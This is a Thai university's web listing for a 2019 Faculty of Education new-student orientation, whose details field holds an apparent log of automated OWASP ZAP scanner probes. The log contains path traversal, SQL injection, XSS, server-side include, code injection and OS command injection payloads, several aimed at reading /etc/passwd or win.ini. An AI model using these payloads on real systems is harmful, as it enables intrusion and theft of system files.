0-4372-5437    

โครงการเตรียมความพร้อมก่อนเปิดภาคเรียน นักศึกษาใหม่ ปีการศึกษา2562

265 View 29 พฤษภาคม 2562

ข้อมูลพื้นฐาน

รหัสกิจกรรม : 62012101
ชื่อกิจกรรม : โครงการเตรียมความพร้อมก่อนเปิดภาคเรียน นักศึกษาใหม่ ปีการศึกษา2562
ประเภทและลักษณะของกิจกรรม : กิจกรรมคณะ
ลักษณะกิจกรรมการเรียนรู้แบบบูรณาการ : ด้านการพัฒนาศักยภาพตนเอง
สังกัด : คณะครุศาสตร์
จัดขึ้นสำหรับ : นักศึกษาชั้นปีที่ 1

การรับสมัคร

จำนวนรับสมัคร : 700 คน
ค่าชั่วโมง : 15 ชั่วโมง/ครั้ง
วันที่ : วันที่27 พ.ค. 2562 - 31 พ.ค. 2562
ประเภทการรับสมัคร : สมัครด้วยตนเองผ่านเว็บไซต์
สถานะ : ปิดรับสมัคร

กำหนดการจัดกิจกรรม

ปีการศึกษา : 1/2562
วันที่ : วันที่27 พ.ค. 2562 - 31 พ.ค. 2562
เวลา : 08.30-15.30
สถานที่ : มหาวิทยาลัยราชภัฏมหาสารคาม
โดย : สโมสรนักศึกษาคณะครุศาสตร์
โทร : 0908204338

รายละเอียดเพิ่มเติม

ZAP
2019-06-16 23:16:45.873    58.8.30.183
c:/Windows/system.ini
2019-06-16 23:18:55.967    58.8.30.183
../../../../../../../../../../../../../../../../Windows/system.ini
2019-06-16 23:18:56.153    58.8.30.183
c:\Windows\system.ini
2019-06-16 23:18:56.327    58.8.30.183
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini
2019-06-16 23:18:56.497    58.8.30.183
/etc/passwd
2019-06-16 23:18:56.670    58.8.30.183
../../../../../../../../../../../../../../../../etc/passwd
2019-06-16 23:18:56.840    58.8.30.183
c:/
2019-06-16 23:18:57.013    58.8.30.183
/
2019-06-16 23:18:57.217    58.8.30.183
c:\
2019-06-16 23:18:57.403    58.8.30.183
../../../../../../../../../../../../../../../../
2019-06-16 23:18:57.577    58.8.30.183
WEB-INF/web.xml
2019-06-16 23:18:57.747    58.8.30.183
WEB-INF\web.xml
2019-06-16 23:18:57.920    58.8.30.183
/WEB-INF/web.xml
2019-06-16 23:18:58.090    58.8.30.183
\WEB-INF\web.xml
2019-06-16 23:18:58.263    58.8.30.183
thishouldnotexistandhopefullyitwillnot
2019-06-16 23:18:58.437    58.8.30.183
ZAP
2019-06-16 23:19:01.747    58.8.30.183 c:/Windows/system.ini
ZAP
2019-06-16 23:19:01.920    58.8.30.183 ../../../../../../../../../../../../../../../../Windows/system.ini
ZAP
2019-06-16 23:19:02.107    58.8.30.183 c:\Windows\system.ini
ZAP
2019-06-16 23:19:02.280    58.8.30.183 ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini
ZAP
2019-06-16 23:19:02.467    58.8.30.183 /etc/passwd
ZAP
2019-06-16 23:19:02.640    58.8.30.183 ../../../../../../../../../../../../../../../../etc/passwd
ZAP
2019-06-16 23:19:02.780    58.8.30.183 c:/
ZAP
2019-06-16 23:19:02.950    58.8.30.183 /
ZAP
2019-06-16 23:19:03.123    58.8.30.183 c:\
ZAP
2019-06-16 23:19:03.293    58.8.30.183 ../../../../../../../../../../../../../../../../
ZAP
2019-06-16 23:19:03.450    58.8.30.183 WEB-INF/web.xml
ZAP
2019-06-16 23:19:03.607    58.8.30.183 WEB-INF\web.xml
ZAP
2019-06-16 23:19:03.780    58.8.30.183 /WEB-INF/web.xml
ZAP
2019-06-16 23:19:03.937    58.8.30.183 \WEB-INF\web.xml
ZAP
2019-06-16 23:19:04.107    58.8.30.183 thishouldnotexistandhopefullyitwillnot
http://www.google.com/
2019-06-16 23:19:53.793    58.8.30.183
http://www.google.com:80/
2019-06-16 23:19:53.980    58.8.30.183
http://www.google.com
2019-06-16 23:19:54.170    58.8.30.183
http://www.google.com/search?q=OWASP ZAP
2019-06-16 23:19:54.357    58.8.30.183
http://www.google.com:80/search?q=OWASP ZAP
2019-06-16 23:19:54.530    58.8.30.183
www.google.com/
2019-06-16 23:19:54.730    58.8.30.183
www.google.com:80/
2019-06-16 23:19:54.920    58.8.30.183
www.google.com
2019-06-16 23:19:55.107    58.8.30.183
www.google.com/search?q=OWASP ZAP
2019-06-16 23:19:55.293    58.8.30.183
www.google.com:80/search?q=OWASP ZAP
2019-06-16 23:19:55.467    58.8.30.183
ZAP
2019-06-16 23:19:57.480    58.8.30.183 http://www.google.com/
ZAP
2019-06-16 23:19:57.670    58.8.30.183 http://www.google.com:80/
ZAP
2019-06-16 23:19:57.840    58.8.30.183 http://www.google.com
ZAP
2019-06-16 23:19:58.077    58.8.30.183 http://www.google.com/search?q=OWASP ZAP
ZAP
2019-06-16 23:19:58.263    58.8.30.183 http://www.google.com:80/search?q=OWASP ZAP
ZAP
2019-06-16 23:19:58.437    58.8.30.183 www.google.com/
ZAP
2019-06-16 23:19:58.623    58.8.30.183 www.google.com:80/
ZAP
2019-06-16 23:19:58.827    58.8.30.183 www.google.com
ZAP
2019-06-16 23:19:58.997    58.8.30.183 www.google.com/search?q=OWASP ZAP
ZAP
2019-06-16 23:19:59.187    58.8.30.183 www.google.com:80/search?q=OWASP ZAP
<!--#EXEC cmd="ls /"-->
2019-06-16 23:20:41.247    58.8.30.183
"><!--#EXEC cmd="ls /"--><
2019-06-16 23:20:41.437    58.8.30.183
<!--#EXEC cmd="dir \\"-->
2019-06-16 23:20:41.607    58.8.30.183
"><!--#EXEC cmd="dir \\"--><
2019-06-16 23:20:41.780    58.8.30.183
ZAP
2019-06-16 23:20:42.793    58.8.30.183 <!--#EXEC cmd="ls /"-->
ZAP
2019-06-16 23:20:43.090    58.8.30.183 "><!--#EXEC cmd="ls /"--><
ZAP
2019-06-16 23:20:43.403    58.8.30.183 <!--#EXEC cmd="dir \\"-->
ZAP
2019-06-16 23:20:43.590    58.8.30.183 "><!--#EXEC cmd="dir \\"--><
0W45pz4p
2019-06-16 23:21:17.013    58.8.30.183
ZAP0W45pz4p
2019-06-16 23:21:17.200    58.8.30.183
'"[removed]alert(1);[removed]
2019-06-16 23:21:17.373    58.8.30.183
ZAP
2019-06-16 23:21:17.890    58.8.30.183 0W45pz4p
ZAP
2019-06-16 23:21:18.060    58.8.30.183 0W45pz4p
ZAP
2019-06-16 23:21:18.217    58.8.30.183 '"[removed]alert(1);[removed]
zApPX16sS
2019-06-16 23:21:47.200    58.8.30.183
ZAP
2019-06-16 23:21:47.513    58.8.30.183 zApPX20sS
ZAP
2019-06-16 23:22:22.590    58.8.30.183
0W45pz4p
2019-06-16 23:24:12.700    58.8.30.183
[removed]alert(1);[removed]
2019-06-16 23:24:13.230    58.8.30.183
2019-06-16 23:24:13.763    58.8.30.183
[removed]alert(1);[removed]
2019-06-16 23:24:14.280    58.8.30.183
2019-06-16 23:24:14.780    58.8.30.183
[removed]alert(1);[removed]
2019-06-16 23:24:15.340    58.8.30.183
2019-06-16 23:24:15.857    58.8.30.183
[removed]alert(1);[removed]
2019-06-16 23:24:16.390    58.8.30.183
2019-06-16 23:24:16.890    58.8.30.183
[removed]alert(1);[removed]
2019-06-16 23:24:17.403    58.8.30.183
2019-06-16 23:24:17.920    58.8.30.183
ZAP
2019-06-16 23:24:18.497    58.8.30.183 0W45pz4p
ZAP
2019-06-16 23:24:19.043    58.8.30.183 [removed]alert(1);[removed]
ZAP
2019-06-16 23:24:19.607    58.8.30.183
ZAP
2019-06-16 23:24:20.170    58.8.30.183 [removed]alert(1);[removed]
ZAP
2019-06-16 23:24:20.717    58.8.30.183
ZAP
2019-06-16 23:24:21.293    58.8.30.183
[removed]alert(1);[removed]
ZAP
2019-06-16 23:24:21.793    58.8.30.183
ZAP
2019-06-16 23:24:22.310    58.8.30.183
[removed]alert(1);[removed]
ZAP
2019-06-16 23:24:22.890    58.8.30.183
ZAP
2019-06-16 23:24:23.480    58.8.30.183 [removed]alert(1);[removed]
ZAP
2019-06-16 23:24:24.013    58.8.30.183
ZAP
2019-06-16 23:24:24.513    58.8.30.183
[removed]alert(1);[removed]
ZAP
2019-06-16 23:24:25.060    58.8.30.183
'
2019-06-16 23:25:34.513    58.8.30.183
ZAP'
2019-06-16 23:25:34.700    58.8.30.183
"
2019-06-16 23:25:34.873    58.8.30.183
ZAP"
2019-06-16 23:25:35.030    58.8.30.183
;
2019-06-16 23:25:35.230    58.8.30.183
ZAP;
2019-06-16 23:25:35.403    58.8.30.183
)
2019-06-16 23:25:35.590    58.8.30.183
ZAP)
2019-06-16 23:25:35.763    58.8.30.183
ZAP
2019-06-16 23:25:35.950    58.8.30.183
ZAP
2019-06-16 23:25:36.107    58.8.30.183
ZAP AND 1=1 --
2019-06-16 23:25:36.280    58.8.30.183
ZAP AND 1=2 --
2019-06-16 23:25:36.450    58.8.30.183
ZAP OR 1=1 --
2019-06-16 23:25:36.640    58.8.30.183
ZAP AND 1=2 --
2019-06-16 23:25:36.793    58.8.30.183
ZAP OR 1=1 --
2019-06-16 23:25:36.967    58.8.30.183
ZAP' AND '1'='1' --
2019-06-16 23:25:37.123    58.8.30.183
ZAP' AND '1'='2' --
2019-06-16 23:25:37.293    58.8.30.183
ZAP' OR '1'='1' --
2019-06-16 23:25:37.467    58.8.30.183
ZAP' AND '1'='2' --
2019-06-16 23:25:37.640    58.8.30.183
ZAP' OR '1'='1' --
2019-06-16 23:25:37.810    58.8.30.183
ZAP UNION ALL select NULL --
2019-06-16 23:25:37.980    58.8.30.183
ZAP' UNION ALL select NULL --
2019-06-16 23:25:38.153    58.8.30.183
ZAP" UNION ALL select NULL --
2019-06-16 23:25:38.327    58.8.30.183
ZAP) UNION ALL select NULL --
2019-06-16 23:25:38.497    58.8.30.183
ZAP') UNION ALL select NULL --
2019-06-16 23:25:38.653    58.8.30.183
ZAP
2019-06-16 23:25:38.827    58.8.30.183
ZAP
2019-06-16 23:25:39.170    58.8.30.183
ZAP
2019-06-16 23:25:39.357    58.8.30.183
ZAP
2019-06-16 23:25:39.543    58.8.30.183
ZAP
2019-06-16 23:25:39.763    58.8.30.183 '
ZAP
2019-06-16 23:25:39.937    58.8.30.183 '
ZAP
2019-06-16 23:25:40.090    58.8.30.183 "
ZAP
2019-06-16 23:25:40.263    58.8.30.183 "
ZAP
2019-06-16 23:25:40.437    58.8.30.183 ;
ZAP
2019-06-16 23:25:40.607    58.8.30.183 ;
ZAP
2019-06-16 23:25:40.780    58.8.30.183 )
ZAP
2019-06-16 23:25:40.950    58.8.30.183 )
ZAP
2019-06-16 23:25:41.107    58.8.30.183
ZAP
2019-06-16 23:25:41.293    58.8.30.183
ZAP
2019-06-16 23:25:41.607    58.8.30.183 AND 1=1 --
ZAP
2019-06-16 23:25:41.950    58.8.30.183 AND 1=2 --
ZAP
2019-06-16 23:25:42.200    58.8.30.183 OR 1=1 --
ZAP
2019-06-16 23:25:42.420    58.8.30.183 AND 1=2 --
ZAP
2019-06-16 23:25:42.763    58.8.30.183 OR 1=1 --
ZAP
2019-06-16 23:25:43.140    58.8.30.183 ' AND '1'='1' --
ZAP
2019-06-16 23:25:43.390    58.8.30.183 ' AND '1'='2' --
ZAP
2019-06-16 23:25:43.607    58.8.30.183 ' OR '1'='1' --
ZAP
2019-06-16 23:25:43.903    58.8.30.183 ' AND '1'='2' --
ZAP
2019-06-16 23:25:44.263    58.8.30.183 ' OR '1'='1' --
ZAP
2019-06-16 23:25:44.450    58.8.30.183 UNION ALL select NULL --
ZAP
2019-06-16 23:25:44.763    58.8.30.183 ' UNION ALL select NULL --
ZAP
2019-06-16 23:25:44.950    58.8.30.183 " UNION ALL select NULL --
ZAP
2019-06-16 23:25:45.170    58.8.30.183 ) UNION ALL select NULL --
ZAP
2019-06-16 23:25:45.390    58.8.30.183 ') UNION ALL select NULL --
ZAP
2019-06-16 23:25:45.577    58.8.30.183
";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var="
2019-06-16 23:26:36.217    58.8.30.183
';print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var='
2019-06-16 23:26:36.403    58.8.30.183
${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}
2019-06-16 23:26:36.607    58.8.30.183
${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}\
2019-06-16 23:26:36.793    58.8.30.183
;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));
2019-06-16 23:26:36.980    58.8.30.183
"+response.write([100,000*100,000)+"
2019-06-16 23:26:37.140    58.8.30.183
+response.write({0}*{1})+
2019-06-16 23:26:37.327    58.8.30.183
response.write(100,000*100,000)
2019-06-16 23:26:37.497    58.8.30.183
ZAP
2019-06-16 23:26:39.107    58.8.30.183 ";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var="
ZAP
2019-06-16 23:26:39.293    58.8.30.183 ';print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var='
ZAP
2019-06-16 23:26:39.467    58.8.30.183 ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}
ZAP
2019-06-16 23:26:39.653    58.8.30.183 ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}\
ZAP
2019-06-16 23:26:39.827    58.8.30.183 ;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));
ZAP
2019-06-16 23:26:40.013    58.8.30.183 "+response.write([100,000*100,000)+"
ZAP
2019-06-16 23:26:40.200    58.8.30.183 +response.write({0}*{1})+
ZAP
2019-06-16 23:26:40.373    58.8.30.183 response.write(100,000*100,000)
ZAP&cat /etc/passwd&
2019-06-16 23:27:59.123    58.8.30.183
ZAP;cat /etc/passwd;
2019-06-16 23:27:59.310    58.8.30.183
ZAP"&cat /etc/passwd&"
2019-06-16 23:27:59.480    58.8.30.183
ZAP";cat /etc/passwd;"
2019-06-16 23:27:59.653    58.8.30.183
ZAP'&cat /etc/passwd&'
2019-06-16 23:27:59.827    58.8.30.183
ZAP';cat /etc/passwd;'
2019-06-16 23:27:59.980    58.8.30.183
ZAP&sleep 15&
2019-06-16 23:28:00.170    58.8.30.183
ZAP;sleep 15;
2019-06-16 23:28:00.357    58.8.30.183
ZAP"&sleep 15&"
2019-06-16 23:28:00.530    58.8.30.183
ZAP";sleep 15;"
2019-06-16 23:28:00.700    58.8.30.183
ZAP'&sleep 15&'
2019-06-16 23:28:00.873    58.8.30.183
ZAP';sleep 15;'
2019-06-16 23:28:01.043    58.8.30.183
ZAP&type %SYSTEMROOT%\win.ini
2019-06-16 23:28:01.217    58.8.30.183
ZAP|type %SYSTEMROOT%\win.ini
2019-06-16 23:28:01.373    58.8.30.183
ZAP"&type %SYSTEMROOT%\win.ini&"
2019-06-16 23:28:01.560    58.8.30.183
ZAP"|type %SYSTEMROOT%\win.ini
2019-06-16 23:28:01.730    58.8.30.183
ZAP'&type %SYSTEMROOT%\win.ini&'
2019-06-16 23:28:01.903    58.8.30.183
ZAP'|type %SYSTEMROOT%\win.ini
2019-06-16 23:28:02.090    58.8.30.183
ZAP&timeout /T 15
2019-06-16 23:28:02.310    58.8.30.183
ZAP|timeout /T 15
2019-06-16 23:28:02.480    58.8.30.183
ZAP"&timeout /T 15&"
2019-06-16 23:28:02.670    58.8.30.183
ZAP"|timeout /T 15
2019-06-16 23:28:02.857    58.8.30.183
ZAP'&timeout /T 15&'
2019-06-16 23:28:03.030    58.8.30.183
ZAP'|timeout /T 15
2019-06-16 23:28:03.217    58.8.30.183
ZAP;get-help
2019-06-16 23:28:03.390    58.8.30.183
ZAP";get-help
2019-06-16 23:28:03.560    58.8.30.183
ZAP';get-help
2019-06-16 23:28:03.730    58.8.30.183
ZAP;get-help #
2019-06-16 23:28:03.937    58.8.30.183
ZAP;start-sleep -s 15
2019-06-16 23:28:04.123    58.8.30.183
ZAP";start-sleep -s 15
2019-06-16 23:28:04.310    58.8.30.183
ZAP';start-sleep -s 15
2019-06-16 23:28:04.480    58.8.30.183
ZAP;start-sleep -s 15 #
2019-06-16 23:28:04.670    58.8.30.183
ZAP
2019-06-16 23:28:10.653    58.8.30.183 &cat /etc/passwd&
ZAP
2019-06-16 23:28:10.840    58.8.30.183 ;cat /etc/passwd;
ZAP
2019-06-16 23:28:11.013    58.8.30.183 "&cat /etc/passwd&"
ZAP
2019-06-16 23:28:11.200    58.8.30.183 ";cat /etc/passwd;"
ZAP
2019-06-16 23:28:11.373    58.8.30.183 '&cat /etc/passwd&'
ZAP
2019-06-16 23:28:11.560    58.8.30.183 ';cat /etc/passwd;'
ZAP
2019-06-16 23:28:11.733    58.8.30.183 &sleep 15&
ZAP
2019-06-16 23:28:11.903    58.8.30.183 ;sleep 15;
ZAP
2019-06-16 23:28:12.077    58.8.30.183 "&sleep 15&"
ZAP
2019-06-16 23:28:12.263    58.8.30.183 ";sleep 15;"
ZAP
2019-06-16 23:28:12.437    58.8.30.183 '&sleep 15&'
ZAP
2019-06-16 23:28:12.607    58.8.30.183 ';sleep 15;'
ZAP
2019-06-16 23:28:12.780    58.8.30.183 &type %SYSTEMROOT%\win.ini
ZAP
2019-06-16 23:28:12.950    58.8.30.183 |type %SYSTEMROOT%\win.ini
ZAP
2019-06-16 23:28:13.123    58.8.30.183 "&type %SYSTEMROOT%\win.ini&"
ZAP
2019-06-16 23:28:13.327    58.8.30.183 "|type %SYSTEMROOT%\win.ini
ZAP
2019-06-16 23:28:13.497    58.8.30.183 '&type %SYSTEMROOT%\win.ini&'
ZAP
2019-06-16 23:28:13.670    58.8.30.183 '|type %SYSTEMROOT%\win.ini
ZAP
2019-06-16 23:28:13.840    58.8.30.183 &timeout /T 15
ZAP
2019-06-16 23:28:14.013    58.8.30.183 |timeout /T 15
ZAP
2019-06-16 23:28:14.200    58.8.30.183 "&timeout /T 15&"
ZAP
2019-06-16 23:28:14.390    58.8.30.183 "|timeout /T 15
ZAP
2019-06-16 23:28:14.577    58.8.30.183 '&timeout /T 15&'
ZAP
2019-06-16 23:28:14.747    58.8.30.183 '|timeout /T 15
ZAP
2019-06-16 23:28:14.920    58.8.30.183 ;get-help
ZAP
2019-06-16 23:28:15.090    58.8.30.183 ";get-help
ZAP
2019-06-16 23:28:15.293    58.8.30.183 ';get-help
ZAP
2019-06-16 23:28:15.480    58.8.30.183 ;get-help #
ZAP
2019-06-16 23:28:15.653    58.8.30.183 ;start-sleep -s 15
ZAP
2019-06-16 23:28:15.840    58.8.30.183 ";start-sleep -s 15
ZAP
2019-06-16 23:28:16.013    58.8.30.183 ';start-sleep -s 15
ZAP
2019-06-16 23:28:16.187    58.8.30.183 ;start-sleep -s 15 #
ZAP
2019-06-16 23:29:13.497    58.8.30.183
5931075115725901683.owasp.org
2019-06-16 23:31:25.467    58.8.30.183
http://5931075115725901683.owasp.org
2019-06-16 23:31:25.640    58.8.30.183
https://5931075115725901683.owasp.org
2019-06-16 23:31:25.840    58.8.30.183
http:\\5931075115725901683.owasp.org
2019-06-16 23:31:26.013    58.8.30.183
https:\\5931075115725901683.owasp.org
2019-06-16 23:31:26.200    58.8.30.183
//5931075115725901683.owasp.org
2019-06-16 23:31:26.390    58.8.30.183
\\5931075115725901683.owasp.org
2019-06-16 23:31:26.560    58.8.30.183
HtTp://5931075115725901683.owasp.org
2019-06-16 23:31:26.747    58.8.30.183
HtTpS://5931075115725901683.owasp.org
2019-06-16 23:31:26.920    58.8.30.183
ZAP
2019-06-16 23:31:28.700    58.8.30.183 5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:28.873    58.8.30.183 http://5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:29.043    58.8.30.183 https://5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:29.217    58.8.30.183 http:\\5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:29.403    58.8.30.183 https:\\5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:29.577    58.8.30.183 //5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:29.763    58.8.30.183 \\5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:29.997    58.8.30.183 HtTp://5931075115725901683.owasp.org
ZAP
2019-06-16 23:31:30.187    58.8.30.183 HtTpS://5931075115725901683.owasp.org
ZAP
2019-06-16 23:32:41.187    58.8.30.183
ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s
2019-06-16 23:32:41.357    58.8.30.183
ZAP
2019-06-16 23:32:41.920    58.8.30.183 ZAP
ZAP
2019-06-16 23:32:42.090    58.8.30.183 ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s
ZAP
2019-06-16 23:32:42.263    58.8.30.183 ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s!s!s!s!s!s!s!s!s!s!s !s!!n"!n#!n$!n%!n&!n'!n(!n)!n0!n1!n2!n3!n4!n5!n6!n7!n8!n9!n@!n
Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
2019-06-16 23:33:16.747    58.8.30.183
any Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
2019-06-16 23:33:16.920    58.8.30.183
any? Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
2019-06-16 23:33:17.090    58.8.30.183
any Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
2019-06-16 23:33:17.263    58.8.30.183
any? Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
2019-06-16 23:33:17.420    58.8.30.183
any Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
2019-06-16 23:33:17.577    58.8.30.183
any? Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
2019-06-16 23:33:17.747    58.8.30.183
ZAP
2019-06-16 23:33:19.140    58.8.30.183 Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
ZAP
2019-06-16 23:33:19.327    58.8.30.183 any Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
ZAP
2019-06-16 23:33:19.497    58.8.30.183 any? Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
ZAP
2019-06-16 23:33:19.687    58.8.30.183 any Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
ZAP
2019-06-16 23:33:19.857    58.8.30.183 any? Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
ZAP
2019-06-16 23:33:20.060    58.8.30.183 any Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
ZAP
2019-06-16 23:33:20.247    58.8.30.183 any? Set-cookie: Tamper=498cf6bb-a2b4-4099-ad1a-4ec6af825009
ZAP
2019-06-16 23:33:55.793    58.8.30.183
2019-06-16 23:33:55.997    58.8.30.183
2019-06-16 23:33:56.170    58.8.30.183
@
2019-06-16 23:33:56.310    58.8.30.183
+
2019-06-16 23:33:56.480    58.8.30.183
2019-06-16 23:33:56.653    58.8.30.183
|
2019-06-16 23:33:56.840    58.8.30.183
ZAP
2019-06-16 23:33:56.997    58.8.30.183
ZAP
2019-06-16 23:33:58.123    58.8.30.183
ZAP
2019-06-16 23:33:58.293    58.8.30.183
ZAP
2019-06-16 23:33:58.467    58.8.30.183
ZAP
2019-06-16 23:33:58.670    58.8.30.183 @
ZAP
2019-06-16 23:33:58.827    58.8.30.183 +
ZAP
2019-06-16 23:33:58.997    58.8.30.183
ZAP
2019-06-16 23:33:59.170    58.8.30.183 |

จำนวนผู้สมัครเข้าร่วม

สมัคร
762
จำนวนที่รับ
700

สรุปข้อมูลการสมัคร

คณะครุศาสตร์
760
คณะเทคโนโลยีการเกษตร
1